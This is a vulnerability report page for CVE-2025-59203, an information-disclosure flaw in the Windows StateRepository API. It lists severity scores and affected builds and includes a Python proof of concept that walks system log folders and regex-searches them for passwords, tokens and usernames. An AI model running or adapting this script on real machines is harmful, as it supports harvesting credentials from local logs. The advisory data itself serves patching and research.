Security Vulnerability Report
CVE-2025-59203 CVSS 5.5 MEDIUM

CVE-2025-59203

Published: 2025-10-14 17:16:00
Last Modified: 2025-10-17 15:27:12

Description

Insertion of sensitive information into log file in Windows StateRepository API allows an authorized attacker to disclose information locally.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE
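Windows 10 (all versions)
Windows 11 (all versions)
Windows Server 2016
Windows Server 2019
Windows Server 2022
Windows Server 2025
Note: the Raw JSON Data below gives, for each release, the build bound (`versionEndExcluding` or `versionEndIncluding`) that delimits the affected range; compare installed builds against those values when checking patch status.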

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59203 - Windows StateRepository API sensitive-information-in-log PoC
#
# Flow: run three Windows query commands, collect log-like files from a fixed
# list of directories, then search their text for secret-looking key names.
#
# NOTE(review): the advisory text does not say which log file receives the
# sensitive data, and nothing in this script checks that the directories it
# walks are the affected ones. Treat a hit as a lead for a log-hygiene review,
# not as evidence that a host is exposed to this CVE.

import os
import subprocess
import glob
import re


def trigger_state_repository_operations():
    """Run three query commands and report whether they could all be launched.

    Each command only reads state: the installed Appx package list, one
    registry key, and the status of the StateRepository service. Exit codes
    are not inspected, so a True result means "no exception was raised"
    (including no timeout), not "every command succeeded".

    Returns:
        True if all three commands ran without raising, otherwise False.
    """
    query_commands = (
        # Lists installed Appx packages.
        ['powershell', '-Command',
         'Get-AppxPackage | Select-Object Name, PackageFullName'],
        # Reads (does not modify) the Appx registry key.
        ['reg', 'query',
         'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Appx'],
        # Asks the service control manager for the service status.
        ['sc', 'query', 'StateRepository'],
    )

    try:
        for command in query_commands:
            subprocess.run(command, capture_output=True, timeout=30)
        print("[+] StateRepository API operations triggered successfully")
        return True
    except Exception as e:
        print(f"[-] Error triggering operations: {e}")
        return False


def find_state_repository_logs():
    """Collect *.log, *.xml and *.etl files below a fixed set of directories.

    Directories that do not exist are skipped. Only the three extensions
    above are matched; other file types in these directories are ignored.

    Returns:
        List of matching paths, ordered by directory and then by extension.
    """
    # NOTE(review): these locations are the PoC author's candidates; confirm
    # against the vendor advisory before relying on them.
    candidate_dirs = [
        os.path.expandvars(template)
        for template in (
            r'%ProgramData%\Microsoft\Windows\StateRepository',
            r'%ProgramData%\Microsoft\Windows\WER',
            r'%LOCALAPPDATA%\Microsoft\Windows\StateRepository',
            r'%WINDIR%\Logs',
            r'%WINDIR%\System32\winevt\Logs',
            r'%ProgramData%\Microsoft\Diagnosis',
        )
    ]
    suffix_globs = ('*.log', '*.xml', '*.etl')

    found_logs = []
    for directory in candidate_dirs:
        if not os.path.exists(directory):
            continue
        for suffix in suffix_globs:
            found_logs.extend(
                glob.glob(os.path.join(directory, '**', suffix), recursive=True)
            )

    print(f"[*] Found {len(found_logs)} potential log files")
    return found_logs


def extract_sensitive_info(log_files):
    """Search each file's text for patterns that suggest sensitive content.

    Each file is read whole, as text, with undecodable bytes dropped. Files
    that cannot be read are reported on stdout and skipped.

    The stored entries are what ``re.findall`` returns for a pattern with
    capture groups: the captured keyword (or a tuple when the pattern has
    more than one group), not the text that follows ``=`` or ``:``. The
    result therefore shows which kinds of keys appear in the logs.

    Args:
        log_files: iterable of file paths to inspect.

    Returns:
        Dict mapping category name to a list of findings; at most ten
        findings are kept per category per file. Categories with no hit
        are absent.
    """
    sensitive_patterns = {
        'credentials': r'(?i)(password|passwd|pwd|credential|secret|api[_-]?key)\s*[=:]\s*\S+',
        'tokens': r'(?i)(token|bearer|jwt|session[_-]?id)\s*[=:]\s*\S+',
        'user_info': r'(?i)(user(name)?|email|mail)\s*[=:]\s*\S+',
        'paths': r'(?i)(C:\\\\Users\\\\[\w\.]+|/home/[\w\.]+)',
        'registry_keys': r'(?i)HK(LM|CU|CR|U|CC)\\\\[\w\\]+',
    }

    sensitive_data = {}
    for log_file in log_files:
        try:
            with open(log_file, 'r', errors='ignore') as handle:
                text = handle.read()
            for category, pattern in sensitive_patterns.items():
                hits = re.findall(pattern, text)
                if hits:
                    # Cap what is kept from any single file.
                    sensitive_data.setdefault(category, []).extend(hits[:10])
        except PermissionError:
            print(f"[!] Permission denied reading: {log_file}")
        except Exception as e:
            print(f"[-] Error reading {log_file}: {e}")

    return sensitive_data


def _scan_and_report():
    """Locate candidate files, scan them, and print a short summary."""
    log_files = find_state_repository_logs()
    if not log_files:
        print("\n[-] No log files found in expected locations")
        return

    sensitive_data = extract_sensitive_info(log_files)
    if not sensitive_data:
        print("\n[*] No sensitive patterns detected in accessible logs")
        return

    print("\n[!] Sensitive information found in log files:")
    for category, data in sensitive_data.items():
        print(f"\n Category: {category}")
        # Only the first five findings per category are shown.
        for item in data[:5]:
            print(f" - {item}")


def main():
    """Print a banner, run the query step, then scan and summarise."""
    banner = "=" * 60
    print(banner)
    print("CVE-2025-59203 - StateRepository API Info Disclosure PoC")
    print(banner)

    # The scan only runs when the query step reported no exception.
    if trigger_state_repository_operations():
        _scan_and_report()

    print("\n[*] PoC execution complete")


if __name__ == '__main__':
    main()

References

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59203 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59203", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:16:00.077", "lastModified": "2025-10-17T15:27:12.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of sensitive information into log file in Windows StateRepository API allows an authorized attacker to disclose information locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.10240.21161", "matchCriteriaId": "030F3214-D6AF-40A9-9FC9-523AC9870581"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.10240.21161", "matchCriteriaId": "4932CB20-D134-4EDF-8F21-F9D0AF80BFEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.14393.8519", "matchCriteriaId": "D8145D41-BFB2-47A6-B5E5-1A038A27C1C1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.14393.8519", "matchCriteriaId": "3EE0CDB1-CBF3-45F2-8F0B-96A9D0757B42"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.7919", 
"matchCriteriaId": "E216CD5B-8885-4E17-8718-97E88A724A44"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "36E44227-0320-43B1-A0D9-EB28B25CDB4D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6456", "matchCriteriaId": "1485A427-10FF-4C39-9911-4C6F1820BE7F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6456", "matchCriteriaId": "26CAACAA-3FE8-4740-8CF2-6BF3D069C47F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22621.6060", "matchCriteriaId": "6F387FA2-66C8-4B70-A537-65806271F16A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.22631.6060", "matchCriteriaId": "4AF873E4-B2FE-4504-BFF0-FC71121FC9A4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.6899", "matchCriteriaId": "41E9F7AC-8E6D-43A0-A157-48A5E0B5BD0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.6899", "matchCriteriaId": "3B77A066-4F79-4B1F-AECF-58DB4C651EA5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.14393.8519", "matchCriteriaId": "860ADFF9-62D0-425B-9310-99ACFC92EB12"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "20810926-AEC9-4C09-9C52-B4B8FADECF3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4294", "matchCriteriaId": "B1C1EA69-6BB8-4E59-8659-43581FDB48B7"}, {"vulnerable": true, 
"criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.1913", "matchCriteriaId": "370C12D6-90EF-44BE-8070-AA0080C12600"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.26100.6899", "matchCriteriaId": "CD6268EB-C42B-406F-B3FF-6E694F93BF41"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59203", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}